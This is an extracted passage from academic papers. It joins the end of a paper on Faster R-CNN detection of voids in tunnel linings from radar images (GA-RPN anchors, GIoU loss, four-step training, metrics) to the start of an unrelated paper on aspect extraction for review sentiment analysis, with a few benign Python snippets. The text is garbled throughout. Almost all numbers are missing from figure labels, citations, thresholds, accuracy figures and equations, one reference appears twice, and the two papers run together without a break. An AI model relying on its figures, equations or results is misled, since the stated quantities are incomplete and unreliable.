) region proposal network. it is used to recommend candidate regions, replacing the earlier selective search. the input is an image (because the rpn and fast rcnn share the same cnn here, the input can also be considered the feature maps), and the output is a set of candidate regions for possible voids, together with a preliminary bounding-box regression. it shares the convolutional features of the whole image with the detection network, removes the speed bottleneck of the original selective search method, and greatly improves the speed of target detection.
) roi pooling. its function is to convert inputs of different sizes into outputs of fixed length, as in the roi pooling of fast rcnn.
) classification and regression. the output of this fully connected layer is the class of each candidate region and its exact location in the image.

the whole process is shown in figure .

figure . structure chart of the rpn
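for orientation, a generic faster rcnn of this kind can be instantiated with torchvision and re-headed for radargram defect classes. this is a minimal sketch of such a setup, not the pipeline used in this paper (which, as described below, combines ga-rpn, giou and a four-step alternating-optimization training schedule); the class count and labels are placeholders.

```python
import torchvision
from torchvision.models.detection.faster_rcnn import FastRCNNPredictor

def build_void_detector(num_classes=3):
    """faster r-cnn with a resnet-50 fpn backbone, re-headed for e.g.
    {background, void in plain concrete, void in reinforced concrete} (illustrative labels)."""
    model = torchvision.models.detection.fasterrcnn_resnet50_fpn(pretrained=True)
    in_features = model.roi_heads.box_predictor.cls_score.in_features
    model.roi_heads.box_predictor = FastRCNNPredictor(in_features, num_classes)
    return model

# training then follows the usual torchvision detection loop:
# loss_dict = model(images, targets); sum(loss_dict.values()).backward()
```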
iv. generating anchors with ga-rpn
regional anchors are an important cornerstone of current target detection methods. most good target detection algorithms rely on the anchor mechanism to sample locations in space evenly with predefined sizes. there are two major problems in the way traditional two-stage anchor-based methods generate anchors: ) low efficiency. the existing method slides windows over the feature map and generates thousands of anchors, yet there are only a few objects in one picture, which leads to far too many negative samples. ) unreasonable a priori assumptions. when generating anchors, it is assumed that the anchor scale or aspect ratio takes a few fixed values, and these values vary from dataset to dataset. to address the above problems, wang et al.[ ] proposed guided anchoring. the guided anchoring mechanism works as follows: the position and shape of a target can be represented by (x, y, w, h), where (x, y) are the coordinates of the object's position in space. if the box of the object is drawn on a given input picture i, the following distribution can be obtained:

p(x, y, w, h | i) = p(x, y | i) p(w, h | x, y, i) ( )

two important pieces of information can be read off this factorization: ( ) the object occupies a specific region of the image; ( ) the size and proportion of the object are closely related to its location. the anchor generation model is therefore designed to contain two branches: one for positioning and one for shape prediction.

a. anchor generation module. this is the position prediction module. the goal is to predict which regions should be used as center points to generate anchors, which is a binary classification problem: predicting whether or not a position is the center of an object. two branches were added to predict, for each pixel on the feature map (i.e., its corresponding receptive field), the confidence of being a center as well as the corresponding width and height. a position is considered a target if its confidence is greater than a specified threshold. obviously, the way proposals are obtained here differs from sliding windows and can greatly reduce the number of negative samples (each position on the feature map generates at most one proposal). in addition, since the width and height are also regressed by the cnn, the objects are not tied to a fixed set of scales, and the width and height are not constrained by any prior assumptions.

b. feature adaption module. this module borrows the idea of deformable convolution. firstly, the width and height of each point are obtained from the anchor generation module. the width and height are represented by a two-channel feature map, and an offset field is then obtained by convolving this two-channel map again. finally, the offset field is applied to the original feature map.

v. improved iou algorithm
target detection depends on the regression of bounding-box coordinates to obtain accurate localization. iou (intersection over union) is an important concept in target detection. in anchor-based methods, it is used not only to separate positive and negative samples but also to evaluate the distance between the predicted box and the ground truth, i.e., the accuracy of the predicted box. one of the better properties of the iou is that it is scale insensitive. in the regression task, the most direct indicator of the distance between the predicted box and the ground truth is the iou, but the loss commonly used for regression is not well suited: the same loss value can correspond to different ious, whereas the iou directly reflects the regression quality. there are, however, two problems with using the iou directly as the loss function:
a. if the two boxes do not intersect, by definition iou = , which does not reflect how far apart they are. at the same time, because the loss is then constant, there is no gradient and no learning takes place.
b. the iou cannot accurately reflect the degree of coincidence between two boxes. as shown in figure below, the iou is equal in all three cases, but the degree of coincidence differs: the case on the left has the best regression and the one on the right the worst.

figure . different border regressions with the same iou

to solve the above problems, rezatofighi et al. proposed giou in , with the following algorithm:

algorithm : generalized intersection over union
input: two arbitrary convex shapes a, b ⊆ s ∈ rⁿ
output: giou
) find the smallest convex shape c ⊆ s ∈ rⁿ enclosing both a and b.
) iou = |a ∩ b| / |a ∪ b|
) giou = iou − |c \ (a ∪ b)| / |c|
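a direct implementation of this algorithm for axis-aligned boxes (the function name and the (x1, y1, x2, y2) box format are our own choices):

```python
def giou(box_a, box_b):
    """iou and generalized iou for two axis-aligned boxes given as (x1, y1, x2, y2)."""
    ax1, ay1, ax2, ay2 = box_a
    bx1, by1, bx2, by2 = box_b
    inter_w = max(0.0, min(ax2, bx2) - max(ax1, bx1))
    inter_h = max(0.0, min(ay2, by2) - max(ay1, by1))
    inter = inter_w * inter_h
    union = (ax2 - ax1) * (ay2 - ay1) + (bx2 - bx1) * (by2 - by1) - inter
    iou = inter / union
    # smallest enclosing (axis-aligned) box c
    c_area = (max(ax2, bx2) - min(ax1, bx1)) * (max(ay2, by2) - min(ay1, by1))
    return iou, iou - (c_area - union) / c_area

# giou((0, 0, 2, 2), (3, 3, 5, 5)) -> iou is 0.0 but giou is negative (about -0.68),
# so a loss of 1 - giou still provides a useful signal for non-overlapping boxes.
```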
c. characteristics of giou
) like the iou, giou is a distance measure; used as a loss function, l_giou = − giou, it meets the basic requirements of a loss function.
) giou is insensitive to scale.
) giou is a lower bound on iou, and in the case of complete overlap between the two boxes, iou = giou.
) the value range of iou is [ , ], while the range of giou is symmetric, [− , ]. from the formula above, giou is always less than or equal to iou. when the two shapes coincide completely, giou = iou = ; when there is no overlap between the two shapes, iou = and the subtracted term drives giou towards − .
) unlike the iou, which only considers the overlapping area, the giou also takes the non-overlapping region into account, and can therefore better reflect how well the two boxes coincide. since giou introduces the enclosing shape c containing both a and b, it can still be optimized when a and b do not coincide.

vi. experimental methods
a. data enhancement
compared with traditional images, the number of gpr images available for deep learning training is generally small, and the lack of data can lead to overfitting of the model. in order to ensure the generalization ability and recognition performance of the trained model, it is therefore important to improve training through data augmentation. the small manually labeled data set was taken as the initial sample, the initial sample set was rotated and compound-rotated, and all the resulting images were taken as the training data set after enlargement.

b. training methods
after data enhancement, the images of plain concrete and reinforced concrete were fed into the neural network to train the model. the faster rcnn model is trained with the alternating optimization method, which is divided into four steps.
) stage _rpn_train.pt: the rpn network is trained separately; the model is initialized with imagenet weights and the parameters are adjusted end to end. backbone+rpn+fast rcnn -> backbone+rpn+fast rcnn; the backbone and rpn parameters are updated.
) stage _fast_rcnn_train.pt: fast rcnn is trained separately as the detection network. the proposals for training come from the rpn of step ; the model is initialized with the imagenet model. backbone+rpn+fast rcnn -> backbone+rpn+fast rcnn; the backbone and fast rcnn parameters are updated.
) stage _rpn_train.pt: the rpn model is initialized with the parameters of the fast rcnn from the second step, but the convolutional layers are fixed during training and only the parameters belonging to the rpn are adjusted. backbone+rpn+fast rcnn -> backbone+rpn+fast rcnn; only the rpn parameters are updated.
) stage _fast_rcnn_train.pt: the shared convolutional layers are kept fixed; the remaining parameters of fast rcnn are fine-tuned with the proposals of the rpn adjusted in step as input. backbone+rpn+fast rcnn -> backbone+rpn+fast rcnn; only the fast rcnn parameters are updated.

the above four steps are shown in figure .

figure . network model training process

c.
evaluation index the general formula for calculating the accuracy is: the number/total number of accurate classification × % [ ]. this paper uses traditional evaluation criteria accuracy: acc= (tp+tn)/ (tp+tn+fp+fn) precision: p= tp/ (tp+fp), the proportion of positive classes in the results after classification. recall: recall=tp/(tp+fn), the proportion of all positive examples divided into pairs. tp means that the positive sample is correctly identified as a positive sample. tn means that negative samples are correctly identified as negative samples. fp indicates that a negative sample is incorrectly identified as a positive sample. fn means that a positive sample is incorrectly identified as a negative sample. the identification criteria for identification of void in the tunnel lining in the image are defined as the type and location of void. the probability size and the coincidence degree of the identification box and the marker box are determined as empty. through the analysis of the sample situation, if the probability of the defect of the geology radar image and the giou reach more than %, the gap will be recognized. vii. conclusion in tunnel construction, geological radar is used to detect highway tunnel engineering, and the radar scanning result map can be used to realize advanced geological forecast, and the hidden danger of geological defects in the tunnel can be found. based on the analysis of the elation principle, a method based on faster rcnn is proposed in this paper to extract the position of the elation in the second lining. compared with the traditional identification method, this method has the characteristics of faster and higher accuracy. since this data set is only plain concrete and reinforced concrete, the scale of annotated data will be further expanded to enrich the diversity of samples to improve the performance of the model. references [ ] li wendi. analysis of gpr image features of tunnel lining defects. [j]. fujian building materials, ( ): - . [ ] zhang chi. research on detection of lining voids of reinforced concrete structures based on geological radar method [j]. railway survey, , ( ): - . [ ] liu jinlong, tan hailiang. application of geological radar in detecting soil defects [j]. engineering quality, , ( ): - . [ ] hinton g e, osindero s, teh y. a fast learning algorithm for deep belief nets [j]. neural computation, , : - . international journal of advanced network, monitoring and controls volume , no. , [ ] krizhevsky a, sutskeever i, hinton g e. imagenet classification with deep convolutional neural networks [j]. communications of the acm, , ( ): - . [ ] girshick r. fast r-cnn[c]// ieee international conference on computer vision (iccv), december - , , santiago, chile. new york: ieee, : - . [ ] ren s, he k, girshick r, et al. faster r-cnn: towards real time object detection with region proposal networks[j]. ieee transactions on pattern analysis and machine intelligence, , ( ): - . [ ] sun y, liang d, wang x g, et al. deepid : face recognition with very deep neural networks [j]. computer science, , ( ): - . [ ] luiz g h, robert s, luiz s o. written dependent feature learning for offine signature verification using deep convolutional neutral networks [j]. pattern recognition, ( ): - . [ ] abdelhamid o, mohamed a r, jiang h, et al. convolutional neural networks for speech recognition[j]. ieee/acm transactions on audio, speech, and language processing, , ( ): - . [ ] redmon j, divvala s, girshick r, et al. 
you only look once: unified, real-time object detection[c]//proceedings of the ieee conference on computer vision and pattern recognition, june - , , seattle, wa, usa. new york: ieee, - . [ ] du yuhong, dong chao-qun, etc. application of improved faster rcnn model in cotton fiber identification [j/ol]. advances in laser and optoelectronics: - [ - - ]. [ ] xu shoukun, wang yaru, gu yuwan etc. research on the detection of helmet wearing based on improved fasterrcnn [j/ol]. computer application research: - [ - - ]. [ ] song shang-ling,yang yang etc. pulmonary nodules detection algorithm based on faster-rcnn [j/ol]. chinese journal of biomedical engineering: - [ - - ]. [ ] wang j, chen k, yang s, et al. region proposal by guided anchoring [j]. . r ezatofighi h, tsoi n, gwak j y, et al. generalized intersection over union: a metric and a loss for bounding box regression [j]. . [ ] rezatofighi h, tsoi n, gwak j y, etc. generalized intersection over union: a metric and a loss for bounding box regression[j]. . [ ] zheng lifei, xiao lito, li xiaoqing. forward modeling and application of geological radar advance prediction [j]. communications science and technology, ( ): - . [ ] wu zhengwen. application of convolution neural network in image classification. chengdu: university of electronic science and technology of china, [ ] lin gang, wang bo etc. multi-target detection and positioning of power line inspection image based on improved faster-rcnn [j]. power automation equipment, , ( ): - . [ ] sainath tn, kingsbury b, saon g, et al. deep convolutional neural networks for large-scale speech tasks [j]. neural networks, , : - . a supervised scheme for aspect extraction in sentiment analysis using the hybrid feature set of word dependency relations and lemmas a supervised scheme for aspect extraction in sentiment analysis using the hybrid feature set of word dependency relations and lemmas bhavana r. bhamare and jeyanthi prabhu department of computer science and engineering, sathyabama institute of science and technology, chennai, tamilnadu, india department of information technology, sathyabama institute of science and technology, chennai, tamilnadu, india abstract due to the massive progression of the web, people post their reviews for any product, movies and places they visit on social media. the reviews available on social media are helpful to customers as well as the product owners to evaluate their products based on different reviews. analyzing structured data is easy as compared to unstructured data. the reviews are available in an unstructured format. aspect-based sentiment analysis mines the aspects of a product from the reviews and further determines sentiment for each aspect. in this work, two methods for aspect extraction are proposed. the datasets used for this work are semeval restaurant review dataset, yelp and kaggle datasets. in the first method a multivariate filter-based approach for feature selection is proposed. this method support to select significant features and reduces redundancy among selected features. it shows improvement in f -score compared to a method that uses only relevant features selected using term frequency weight. in another method, selective dependency relations are used to extract features. this is done using stanford nlp parser. the results gained using features extracted by selective dependency rules are better as compared to features extracted by using all dependency rules. 
in the hybrid approach, both lemma features and selective dependency relation based features are extracted. using the hybrid feature set, . % accuracy and . % f -score is achieved in the aspect category prediction task. subjects artificial intelligence, data mining and machine learning keywords feature extraction, aspect based sentiment analysis, machine learning, natural language processing, support vector machine introduction quick improvements in e-commerce websites lead customers to purchase and analyze products online. also, it allows end-users to express their views/opinions related to an item and services by means of reviews. these opinions are useful for other users to decide about the purchase of a product. these are also helpful to manufacturers to enhance the quality of their items and services and they may know what exactly customers want. in any case, it is hard for an individual to analyze a large number of reviews and rate them according to various aspects of the product. hence, it is required to analyze all users' views and classify them with respect to different aspects. sentiment analysis (sa) has a significant role in analyzing and summarizing all the opinions. sa is the analysis of the reviews given by the people about any product on various e-commerce websites or social media, etc. sa can be done at different levels of granularity (hu & liu, ), they are aspect, sentence and document level. aspect level sa recognizes the polarity of each individual aspect of a product. it includes tasks like aspect term extraction and opinion target extraction etc. in sentence level sa, polarity is predicted for the complete sentence. it deals with the recognition of statements as objective or subjective, while in document level sa the polarity is predicted for the complete review or document. it extracts opinion bearing words and detects its polarity. the work in this paper focuses on absa. aspect is nothing but the component or attribute of the product. in other words, absa is a sa method that finds the aspects/attributes of a product and afterward designates an estimation level (positive, negative or neutral) to each attribute. the large distinction between sa and absa is that the former just distinguish the feeling of full text, while the latter breaks down every content to recognize different aspects and decide the relating sentiment for each one of them. aspects can be implicit or explicit based on the presence of aspect terms. statements with implicit aspects do not contain direct aspect terms. instead, we need to recognize it from the words or expressions expressed in the user reviews. the following two sentences are reviews about mobile phones.
for a mobile phone, aspects can be a battery, camera, audio, memory, processing speed, etc. in sentence , the aspect term is a camera and the sentiment specifying word is “good” that is, sentiment is positive. in this sentence, the camera word is not used directly instead it is signified by the phrase “picture quality”. so the aspects may be specified explicitly or implicitly in the sentence. the implicit aspect in the second sentence is a battery which is represented by the word “charging”. sentence : the picture quality of this mobile is good. sentence : it does not need charging for a long time. this section focuses on exhaustive literature review which covers various aspects of contemporary area of research. the survey focuses on absa applications, aspect extraction and selection techniques suggested in earlier works, knowledge-based approaches to consider semantic features, topic-based methods for selecting features that are independent of the subject matter and deep cnn approach. absa analysis has a number of applications such as movie rating prediction, restaurant recommendation, financial news analysis (ahmad, cheng & almas, ), political predictions, etc. benkhelifa, bouhyaoui & laallam ( ) proposed a system that will rank numerous cooking recipes which helps to choose the finest by using reviews of users. this system also makes use of metadata of youtube videos and improves the performance. it has performed three tasks subjectivity detection, aspect extraction, and sentiment classification. for both subjectivity detection and sentiment classification, features are bhamare and prabhu ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ selected using tf-idf feature weighting method and for classification nb and svm classifiers are used. in both, the svm algorithm outperforms the nb classifier. the aspect extraction is done with a rule-based approach using stanford dependency parser. akhtar et al. ( ) proposed a recommender system that endorses the best hotel for the user. in this approach, first, the topic modeling technique is used to recognize concealed data and aspects. further, the sentiment analysis is used on classified sentences and finally, summarization is done. for topic modeling, the mallet tool is used and sentiment analysis is done using the sentiwordnet corpus. as reviews are summarized based on aspect category, it gives a better understanding of the reviews. afzaal, usman & fong ( ) proposed a framework for mobile tourism app using absa. with pos tagger, the nouns and noun phrases are extracted seeing them as candidate features to decide aspect category. the co-referential aspects are clustered by means of wordnet and aspects with occurrence count more than are selected that assisted to extract explicit aspects. a decision tree approach is used to pull out implicit aspects. sentiment analysis is done using five different classifiers, amongst all nbm classifier shown good results with an accuracy of . % on the restaurant review dataset. vanaja & belwal ( ) and anand & naorem ( ) analyzed amazon customer surveys and amazon movie reviews, respectively. vanaja & belwal ( ) distinguished among naïve bayes and svm algorithm on sentiment analysis task. in it, features are extracted by applying part of speech tagging and selecting nouns, verbs, adverbs, adjectives, and pronouns from each review. frequent features are selected using the apriori algorithm. 
these features are pruned by removing stop words and then the classifiers are applied to determine the class labels as positive, negative or neutral. the nb classifier outperformed the svm with accuracy . %. anand & naorem ( ) performed absa in two stages: to detect aspect and determine sentiment for the aspect. the stanford dependency parser is applied using some handcrafted rules to extract aspect-sentiment pairs. the polarity of extracted sentiment words is determined using the sentiwordnet corpus. to detect the aspect some aspect clue words are used. these clue words are chosen by three approaches: manual labeling, clustering, and review guided clustering. el hannach & benkhalifa ( ) proposed crime identification using implicit aspects and it is done on the twitter dataset. this research is carried out in three main stages: implicit aspect sentence detection, implicit aspect term extraction and implicit aspect identification (iai). the features used for this work are adjectives and verbs along with its wordnet synonyms selected using term frequency-inverse class frequency (tf-icf). the classifiers used for iai are mnb, svm and rf. this work has shown that the usage of tf-icf achieves better compared to tf-idf. absa can be done using different approaches. many approaches focus on feature extraction and selection process. features can be selected using strategies like occurrence frequency, syntax-based rules, semantics or the hybrid approach. significant features are more supportive to predict the aspect category and sentiment class. a comparative study of numerous existing language rule-based aspect extraction methods is quantified by ruskanda, widyantoro & purwarianti ( ). observations demonstrate that the accuracy of a language rule-based aspect extraction technique is broadly resolved by the bhamare and prabhu ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ completeness and accuracy of rules compared to other technologies. poria et al. ( ) proposed a dependency rule-based methodology to resolve the issue of aspect extraction from reviews of products. in this research, authors used stanford parser to get the dependency tree and further some dependency rules are applied to mine aspects from a sentence. this work indicates significant improvement as it works on the extraction of relevant features. rana & cheah ( a), rana & cheah ( b) and rana & cheah ( ) worked on ruled based methods for extracting product features. rana & cheah ( a) presented a two-fold rule-based approach to extract aspects. in this, first, fold extract aspects related to domain-independent opinions and second fold extract aspects related to domain-dependent opinions. the author also applied frequency and similarity measure to enhance the accuracy of the aspect extraction of an established system. rana & cheah ( b) proposed a two-level aspect pruning approach that can reduce inappropriate aspects. the author used the sequential pattern-based model to extract noun phrases that represent aspects. aspect elimination is done by estimating the frequency of each word and picking the most frequent aspects. further, the semantic similarity measure is used to select non-frequent features. asghar et al. ( ) proposed a framework performing aspect extraction, sentiment classification, and summary generation. in this work, heuristic rules are used for aspect-sentiment pair extraction. 
the aspect terms are grouped based on their co-reference pmi value and assigned one aspect category. the sentiment classification is done using the sentiwordnet lexicon. in this work, a summary is generated as a list of positive and negative aspects individually with their sentiment scores. shafie et al. ( ) presented research that uses numerous types of dependency relation for extracting candidate aspects from user review. firmanto & sarno ( ) proposed an aspect-based sentiment analysis method utilizing grammatical rules, word similarity and senticircle. the proposed method starts with the extraction of candidate aspects using grammatical rules. authors used word embedding and word similarity in preprocessing steps for aspect categorization. for keyword extraction, tf-icf is used and in the end, senticircle is utilized to find sentiment polarity. agarwal et al. ( ) presented a concept based approach using dependency rules. in this research, the authors used some dependency rules for feature extraction. the extracted features are enriched by adding some commonsense knowledge extracted from conceptnet. these features are pruned by means of the mrmr feature reduction approach and sentiment classes are predicted using an svm classifier. asghar et al. ( ) used a rule-based classification system to enhance the sentiment classification of reviews in online communities. the essential purpose of this work is to improve the overall performance of sentiment analysis by considering additional features like modifiers, emoticons, domain-related phrases and negations. kang & zhou ( ) proposed rube—unsupervised rule-based techniques to extract subjective and objective features from online consumer reviews. in this work, objective features are collected by integrating part-whole relations and patterns that are specific to reviews. subjective features collected by applying double propagation with indirect dependency and comparative construction. in absa, after feature extraction, feature pruning is necessary to avoid the risk of overfitting and improve accuracy. reduced features require less time for training. bhamare and prabhu ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the statistical weight of features can be used to reduce the feature set. so selecting or proposing a feature selection strategy is an open research issue. manek et al. ( ) presented a gini index based feature selection technique with svm classifier that classifies sentiment of movie reviews. this method verified that the gini index improved classification accuracy compared to other feature weighting techniques. liu et al. ( ) proposed a weighted gini index (wgi) feature selection method for imbalanced data. various algorithms namely chi-square, f-statistic and gini index feature selection are compared with proposed system. according to their work f-statistic provides the best performance in the minority class. if the numbers of selected features are more, wgi feature selection lead to better performance. uysal ( ) proposed an enhanced global feature selection system which enhances the classification performance. it offers an improved approach to filter-based feature selection. the improved global feature selection scheme (igfss) is the combination of the global feature selection technique and the local feature selection method. the performance of classification is significantly improved with the igfss approach. 
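as background, the gini-style feature scores used in these studies rank a term by how concentrated its occurrences are in a single class. the sketch below is only a generic illustration of that idea (individual papers, including manek et al. and liu et al., define the index differently); the function names and the top-k selection are ours.

```python
import numpy as np

def gini_score(class_counts):
    """gini-index style purity score for a feature, given its occurrence counts
    per class; equals 1 minus the gini impurity of the class distribution,
    so higher means the feature concentrates in fewer classes."""
    counts = np.asarray(class_counts, dtype=float)
    p = counts / counts.sum()
    return float(np.sum(p ** 2))

def select_top_features(feature_counts, k=1000):
    """rank features by the score above and keep the k best (illustrative only)."""
    scored = sorted(feature_counts.items(), key=lambda kv: gini_score(kv[1]), reverse=True)
    return [f for f, _ in scored[:k]]
```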
many researchers merged commonsense knowledge, the semantics of features with ontology to improve the accuracy of aspect extraction and sentiment classification. schouten, frasincar & de jong ( ) and schouten & frasincar ( ) proposed ontology- enhanced aspect-based sentiment analysis. schouten, frasincar & de jong ( ) concentrated on a knowledge-driven solution with the aim to complement standard machine learning (ml) method. the writers encoded the domain knowledge into a knowledge repository/ontology. in this research, both aspect detection and aspect sentiment analysis is done. it shows that the embedding of commonsense knowledge with ontology-based features improve the performance of classification. for both tasks the libsvm classifier is used. schouten & frasincar ( ) prepared ontology with three classes like sentimentmention, aspectmention, and sentiment value. the ontology is generated using an onto-clean methodology. if the ontology does not predict any class, then the class prediction is done using the bag-of-words backup model. this research signifies that encoding domain knowledge in ontology advances the result of sentiment classification. de kok et al. ( a) and de kok et al. ( b) proposed an ontology centered approach for review level aspect-based sentiment analysis. in this work, they mainly focus on ontology-enhanced methods that complement a standard ml algorithm. for these two different algorithms are used, a review-based and a sentence aggregation algorithm. their work contains feature generators and feature adaptors. several feature generators are independent of the ontology which are aspect, sentence count, lemma and several are dependent on an ontology which are ontology concepts, sentiment count. also, they used several feature adaptors which are ontology concept score, negation handling, synonyms, weight, word window, etc. ma, peng & cambria ( ) improved the lstm network with a hierarchical attention mechanism. the main influence of this work is the integration of commonsense knowledge of sentiment related concepts into an attentive lsmt. this research accomplished the two tasks that is, aspect extraction and sentiment classification. zeng et al. ( ) used a convolutional neural network (cnn) with linguistic resources and gating mechanism for aspect-based sentiment analysis (absa). al-smadi et al. ( ) bhamare and prabhu ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ suggested a supervised learning method for aspect extraction and classification of sentiments. the classifiers are trained on lexical, morphological, syntactic and semantic features. baas et al. ( ) introduced a new approach by using svm with six different pattern classes. this includes lexical, syntactic, semantic, hybrid, and surface feelings. the lexico-semantic patterns were used in the customer reviews to identify aspect-based feeling (abs). synset bigram, negator pos bigram, and pos bigram are used to enhance the extraction of aspects based on feelings. latent dirichlet allocation topic model is applied by amplayo, lee & song ( ). this work is an extension of the aspect and sentiment unification model (asum). it considers seller sentiments for aspect extraction and sentiment classification. seller-aided aspect-based sentiment model (sa-asm) and seller-aided product based sentiment model (sa-pbm) are proposed. sa-asm provides improved results for sentiment classification and sa-pbm for aspect extraction. 
al moubayed, mcgough & hasan ( ) proposed a deep learning approach for topic modelling. topic modelling is used in this method for extraction of features and it eliminates the need for subject-specific lexicon. firstly, the dataset is categorized into two categories like positive and negative. then topic modelling is used to extract features from each class of training dataset that are further given as input to train the stacked denoising autoencoders (sdas). the overall reconstruction error from each sda is used by a linear classifier to predict the class. xu et al. ( ) suggested a new implicit aspect recognition method that relies on non-negative matrix factorization (nmf). this method clusters aspects of a product by merging co-occurrence data with intra-relations of aspects and sentiments. kim ( ) proposed an advanced semi-supervised system for reducing dimensionality. weighting and extraction of features are performed in a semi-supervised manner. kumar, pannu & malhi ( ) introduced the aspect based sa using semantic features and deep networks. domain-specific ontology is generated after preprocessing of review sentences to obtain semantic features. the word vec is generated by applying unsupervised neural network to the processed corpus. this vector is used for training cnn model. this method has produced significant results. the cnn model is optimized using particle swarm optimization. the subtasks in absa are aspect term extraction, aspect category detection, opinion term extraction, and sentiment analysis. the proposed system is focusing only on aspect category detection. in aspect category detection task aspect terms are important to detect category. if the aspect terms are not specified explicitly then it can be predicted from the opinion words also. therefore, the proposed system works on lemma features as well as dependency rule-based features. dependency rule-based features are meaningfully related words in a sentence which support to predict aspect category. the main objectives of this research work are, (i) to examine the effect of feature selection strategy on classification performance, (ii) to examine the effect of dependency rule-based features on the classification performance. the datasets used in this system are semeval restaurant review dataset (pontiki et al., ), yelp and kaggle datasets. the article is structured as; “introduction” highlights recent developments in the field of research, proposed method is presented in “proposed method”, “results and discussion” focuses on results and discussion and concluding remarks is presented in “conclusions”. bhamare and prabhu ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ proposed method the technique presented in this article uses a supervised methodology for aspect extraction from review sentences. the datasets used for this research are semeval restaurant review dataset, yelp and kaggle datasets. semeval restaurant review dataset contains , training sentences and test sentences. the restaurant reviews are specified in sentence format. the snippet of the dataset is shown in fig. . this dataset has sentences with the aspect categories like food, ambiance, price, service and miscellaneous/anecdotes. these categories of aspects can be specified explicitly or implicitly. explicit aspect categories are specified directly in the sentences. for example, in the above snippet, the first sentence is about the food aspect and the aspect is explicitly specified in it. 
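a minimal sketch of the preprocessing step described above (stop word removal, lemmatization, punctuation removal and contraction expansion), assuming nltk for tokenization and lemmatization since the paper does not name a specific toolkit; the contraction list is only illustrative.

```python
import re
import nltk
from nltk.corpus import stopwords
from nltk.stem import WordNetLemmatizer

# requires the nltk "punkt", "stopwords" and "wordnet" resources to be downloaded
CONTRACTIONS = {"can't": "cannot", "isn't": "is not",
                "don't": "do not", "won't": "will not"}  # illustrative subset only
STOP = set(stopwords.words("english"))
LEMMATIZER = WordNetLemmatizer()

def preprocess(sentence):
    """expand contractions, strip punctuation, drop stop words and lemmatize."""
    s = sentence.lower()
    for short, full in CONTRACTIONS.items():
        s = s.replace(short, full)
    s = re.sub(r"[^\w\s]", " ", s)          # remove punctuation marks
    tokens = nltk.word_tokenize(s)
    return [LEMMATIZER.lemmatize(t) for t in tokens if t not in STOP]

# example: preprocess("The picture quality of this mobile isn't good!")
```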
the aspect of the second review sentence is service, but it is not specified explicitly. the word “small tip” specifies it. in reviews, a single sentence may have one or more aspect categories. the aim of this study is to extract aspects from the review sentences and not to decide sentiments. the detailed architecture is demonstrated in fig. . the process of aspect category extraction is elaborated as below. preprocessing first, the stop words are removed from training and test sentences and then the lemmatization is done. from both datasets, punctuation marks are removed and contractions like can’t, isn’t, etc. are replaced with cannot and is not. feature extraction in feature extraction, two types of features are extracted from the training dataset and a hybrid feature set is created. the extracted features include: a) lemma features b) rule based features c) hybrid features figure example snippet from restaurant review dataset. full-size doi: . /peerj-cs. /fig- bhamare and prabhu ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ a) lemma features: the process of lemma feature extraction and selection includes the following steps: . after preprocessing, the lemmas are extracted from each sentence. a matrix is generated from these lemma features that contain review id, lemma feature, term frequency of each feature and aspect category label. here, in the corresponding aspect group, term frequency is the number of times the term is present in that aspect category. from this matrix, distinct lemmas with term frequency more than threshold thf in corresponding aspect category are selected. here, threshold thf is . this value is selected based on intuition. . further, a matrix is generated which contains review id, lemma features, its term frequency in each aspect categories and the actual aspect category label. . this matrix is considered as a training matrix. during testing, the following process is followed. . from each test sentence, lemmas are extracted. . for each lemma in the test sentence, a vector from a training matrix for the matching lemma is copied to the test matrix. figure proposed system architecture. full-size doi: . /peerj-cs. /fig- bhamare and prabhu ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ . the above process is done for all lemma features in a test sentence. then probability is calculated for each aspect category. the aspect category having the highest probability is given as a category label for the test sentence. in line with the first objective, the above is the base system where features are selected using term frequency only. the same experimentation is carried out using a multivariate filter method of feature selection. in classification problems, an excessive number of features not only increase the computational time but also degrade the accuracy of classification (abualigah et al., ). so it is necessary to extract significant features. these selective features train the machine learning algorithm faster, increases accuracy and avoids overfitting. methods of feature selection can be classified into categories: filter, wrapper, and hybrid approaches (labani et al., ). in the wrapper method of feature selection, a subset of features is selected to train the machine learning algorithm. based on the results, the features are added or removed from the set. 
in the filter approach, feature selection is independent of any machine learning algorithm. here, features are selected based on statistical tests like linear discriminant analysis, analysis of variance, chi-square etc. filter methods are classified as a univariate and multivariate feature selection methods. in the univariate method, individual features are assigned a statistical score and top-ranked features are selected. the disadvantage of this approach is that it selects relevant features and ignores redundancy among them as it ignores the relationship between features. in the multivariate method, the relationship between individual features is considered. the combination of filter and wrapper methods is the hybrid method. the proposed system uses a multivariate filter approach. in it, relevant features are selected by means of weighted term frequency score and redundancy is avoided by calculating the pearson correlation coefficient between features. in the proposed system, similar to the base system, features having term frequency greater or equal to three is selected. weight is calculated for the selected terms as per eq. ( ). terms with a weight greater than threshold thwk are selected. here thwk is the threshold on weight in aspect category k. from these features, a matrix is generated which contains review id, feature, term frequency in all aspect categories and the actual aspect category label. for each feature in an aspect category, the correlation is determined with all other terms in the related category. features with correlation value that exceeds the threshold thc are not considered because these are highly correlated features that may increase redundancy. the value of threshold thc for this experimentation is . which is selected through repetitive testing. similar to the base system, a training matrix is generated using selected features and testing is performed. weight fð Þ ¼ frequency fð Þk total frequency fð Þ ( ) the above-stated feature selection strategy enhanced the result of the aspect extraction task compared to the method which uses term frequency-based features only. this feature bhamare and prabhu ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ selection approach is an extension of the work described in bhamare, jeyanthi & subhashini ( ) where a correlation was calculated using the weight of terms. here it is calculated using the term frequency of features. b) rule based features: in this approach, features are selected based on grammatical relationships between words. stanford nlp parser is used to extract grammatical relationships between words. sometimes the phrases or related words in a sentence give more information about the aspect compared to the single lemma features. as in fig. , the arrows indicate the relationship between words in a sentence. the parser extracts the features: like restaurant, like food, like i, restaurant this, food tasty, etc. in the first testing, all the dependency relationships 